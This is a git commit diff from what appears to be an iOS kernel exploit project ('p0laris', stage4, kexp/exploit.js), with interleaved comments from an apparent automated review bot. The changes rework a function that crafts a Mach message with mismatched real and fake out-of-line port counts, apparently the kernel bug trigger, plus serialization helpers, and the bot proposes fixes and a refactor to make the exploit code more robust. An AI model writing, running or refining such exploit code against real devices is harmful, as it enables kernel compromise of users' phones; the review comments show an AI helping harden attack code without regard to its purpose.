authorspv420 <spv@spv.sh>2022-08-01 13:45:45 -0400
committerspv420 <spv@spv.sh>2022-08-01 13:45:45 -0400
commit7a206940e14b0d269744bd598be075e33ef19aea (patch)
treebc257982f7ee4e291a183aa4153268974285eecd /src/stage4
parent5ed6a7bb64ecf24c6dd12506688b43d9f33b65d2 (diff)
fuck
Diffstat (limited to 'src/stage4')
-rwxr-xr-xsrc/stage4/kexp/exploit.js43
-rw-r--r--src/stage4/lib/native_ptr.js31
-rw-r--r--src/stage4/main.js4
3 files changed, 52 insertions, 26 deletions
diff --git a/src/stage4/kexp/exploit.js b/src/stage4/kexp/exploit.js
index 8103639..327c813 100755
--- a/src/stage4/kexp/exploit.js
+++ b/src/stage4/kexp/exploit.js
@@ -277,28 +277,33 @@ function release_port_ptrs(port) {
function r3gister(task, init_port_set, real_count, fake_count) {
var mess = shit_heap(0x1000);
-// var InP = mess;
-// var OutP = mess;
-
- var InP = new Request(1, mess);
- var OutP = new Reply(1, mess);
-
- write_u32(InP + 0x18, 1);
- write_u32(InP + 0x1c, init_port_set);
- write_u32(InP + 0x20, real_count);
- write_u32(InP + 0x24, ((19 << 16) + (MACH_MSG_OOL_PORTS_DESCRIPTOR << 24)));
- write_u32(InP + 0x28, read_u32(NDR_record + get_dyld_shc_slide() + 0x0));
- write_u32(InP + 0x2c, read_u32(NDR_record + get_dyld_shc_slide() + 0x4));
- write_u32(InP + 0x30, fake_count);
- write_u32(InP + 0x0, 0x80001513);
- write_u32(InP + 0x8, task);
- write_u32(InP + 0xc, mig_get_reply_port());
- write_u32(InP + 0x14, 3403);
-
- var ret = mach_msg(InP, 0x3, 0x34, 0x2c, read_u32(InP + 0xc), MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
+ var InP_ptr = mess;
+ var OutP = mess;
+
+ var InP = new Request_r3(1, mess);
+ var InP_obj = InP.deref();
+
+ InP_obj.msgh_body.msgh_descriptor_count = 1;
+ InP_obj.init_port_set.address = init_port_set;
+ InP_obj.init_port_set.count = real_count;
+ InP_obj.init_port_set.disposition = 19;
+ InP_obj.init_port_set.deallocate = false;
+ InP_obj.init_port_set.type = MACH_MSG_OOL_PORTS_DESCRIPTOR;
+ InP_obj.NDR = read_buf(NDR_record + get_dyld_shc_slide(), 8);
+ InP_obj.init_port_setCnt = fake_count;
+ InP_obj.Head.msgh_bits = MACH_MSGH_BITS_COMPLEX | MACH_MSGH_BITS(19, MACH_MSG_TYPE_MAKE_SEND_ONCE);
+ InP_obj.Head.msgh_remote_port = task;
+ InP_obj.Head.msgh_local_port = mig_get_reply_port();
+ InP_obj.Head.msgh_id = 3403;
+
+ InP.write(InP_obj);
+
+ var ret = mach_msg(InP.addy, 0x3, 0x34, 0x2c, InP_obj.Head.msgh_local_port, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
if (ret == KERN_SUCCESS) {
+ // i'm not making a fucking class for this shit
ret = read_u32(OutP + 0x24);
}
+
return ret;
}
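Review bot: `InP_ptr` is assigned on the first added line (`var InP_ptr = mess;`) and never read anywhere in the function; it should be dropped. The `mach_msg` call still hard-codes the send size `0x34` and receive size `0x2c` even though the request is now built from the `Request_r3` type, whose size is written out as `24 + 4 + 12 + 8 + 4` in native_ptr.js, so the two can drift apart silently; if the type object exposes its size, take the send size from it, and otherwise leave a comment tying the constant to the type definition. `OutP` is the same buffer as the request, which deserves a one-line note above the read, e.g. `// the reply is written over the request buffer; status word is at +0x24`. Finally `ret == KERN_SUCCESS` should be `ret === KERN_SUCCESS`, matching the comparison style the linter will expect.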
diff --git a/src/stage4/lib/native_ptr.js b/src/stage4/lib/native_ptr.js
index 81ac562..1ae5456 100644
--- a/src/stage4/lib/native_ptr.js
+++ b/src/stage4/lib/native_ptr.js
@@ -271,8 +271,7 @@ function Request_r3_buf_to_obj(buf) {
return ret;
}
-/*
-function Request_r3_buf_to_obj(buf) {
+function Request_r3_obj_to_buf(obj) {
var ret = new Uint8Array(this.size);
var tmp = mach_msg_header_t_obj_to_buf(obj.Head);
var begin = 0;
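Review bot: `Request_r3_obj_to_buf` sizes its buffer with `this.size`, but it is a plain function declaration, so `this` is only meaningful if `native_ptr_type` invokes it with an explicit receiver; called directly, `this` is `undefined` in strict mode (or `globalThis` otherwise), `new Uint8Array(undefined)` yields a zero-length array, and every later `ret[i] = …` write is silently dropped. Either take the size from a module constant shared with the `Request_r3` definition, or document the calling convention above the function: `// must be invoked as a method of the native_ptr_type object (reads this.size)`. The function body continues past this hunk.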
@@ -292,16 +291,32 @@ function Request_r3_buf_to_obj(buf) {
ret[i] = tmp[i - begin];
}
- var tmp = mach_msg_ool_ports_descriptor_t_obj_to_buf(obj.init_port_set[i]);
+ var tmp = mach_msg_ool_ports_descriptor_t_obj_to_buf(obj.init_port_set);
+
+ begin = i;
+
+ for (; i < 40; i++) {
+ ret[i] = tmp[i - begin];
+ }
+
+ var tmp = buf_ret(obj.NDR);
begin = i;
- for (; i < 36; i++) {
+ for (; i < 48; i++) {
ret[i] = tmp[i - begin];
}
+ var tmp = u32_to_u8x4(obj.init_port_setCnt);
-}*/
+ begin = i;
+
+ for (; i < 52; i++) {
+ ret[i] = tmp[i - begin];
+ }
+
+ return ret;
+}
function buf_ret(buf) {
return buf;
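Review bot: `tmp` is re-declared with `var` three times in the new lines (descriptor, `NDR`, `init_port_setCnt`), and the copy loop `begin = i; for (; i < N; i++) { ret[i] = tmp[i - begin]; }` is repeated verbatim with the bounds 40, 48 and 52 hard-coded. Those bounds are the running sum of `24 + 4 + 12 + 8 + 4` from the `Request_r3` definition and will drift if any field size changes; a small helper that appends a segment and returns the next offset removes both the duplication and the magic numbers, assuming each converter returns a buffer of exactly its field size (which the fixed bounds already rely on). The declaration of `i` and the `Head`/`msgh_body` copies sit above this hunk and are unchanged.
```javascript
// Copies `src` into `dst` at offset `at`; returns the offset just past it.
function appendSegment(dst, src, at) {
  for (let k = 0; k < src.length; k++) {
    dst[at + k] = src[k];
  }
  return at + src.length;
}

// … unchanged: Head and msgh_body copies …
i = appendSegment(ret, mach_msg_ool_ports_descriptor_t_obj_to_buf(obj.init_port_set), i);
i = appendSegment(ret, buf_ret(obj.NDR), i);
i = appendSegment(ret, u32_to_u8x4(obj.init_port_setCnt), i);
return ret;
```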
@@ -333,7 +348,11 @@ var mach_msg_type_number_t = uint32_t;
var Request_r3 = native_ptr_type(24 + 4 + 12 + 8 + 4,
Request_r3_buf_to_obj,
- buf_ret);
+ Request_r3_obj_to_buf);
+
+/*var Reply_r3 = native_ptr_type(24 + 4 + 12 + 8 + 4,
+ Reply_r3_buf_to_obj,
+ Reply_r3_obj_to_buf);*/
var mach_msg_trailer_type_t = uint32_t;
var mach_msg_trailer_size_t = uint32_t; \ No newline at end of file
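Review bot: The commented-out `Reply_r3` block added here references `Reply_r3_buf_to_obj` and `Reply_r3_obj_to_buf`, neither of which exists in this diff, so it is dead text that will rot; replace it with a tracked follow-up such as `// TODO: add Reply_r3 once its buf_to_obj/obj_to_buf converters exist` or drop it. The size expression `24 + 4 + 12 + 8 + 4` is now duplicated between the live `Request_r3` line and the comment, and the same running totals appear as 40/48/52 in `Request_r3_obj_to_buf`; hoisting it into one named constant would keep those in step. The file also ends without a trailing newline.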
diff --git a/src/stage4/main.js b/src/stage4/main.js
index 7baffe2..ec29972 100644
--- a/src/stage4/main.js
+++ b/src/stage4/main.js
@@ -154,7 +154,9 @@ function main() {
// return;
- var tfp0 = get_kernel_task();
+ r3gister(0x41, 0x42, 0x43, 0x44);
+
+// var tfp0 = get_kernel_task();
syslog(LOG_SYSLOG, "__p0laris_LOG_END__");
return 0;
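Review bot: The return value of `r3gister(0x41, 0x42, 0x43, 0x44)` is discarded and its arguments are placeholder constants, so nothing in `main` records whether the new message builder actually ran; if this is a smoke test, capture and log it next to the existing syslog, e.g. `var r3ret = r3gister(0x41, 0x42, 0x43, 0x44);` followed by `syslog(LOG_SYSLOG, "r3gister: " + r3ret);`, and mark the line with a `// TODO` so it is not mistaken for the intended flow. The commented-out `get_kernel_task()` call and the `// return;` above it are likewise better removed or explained. `main` closes outside this hunk.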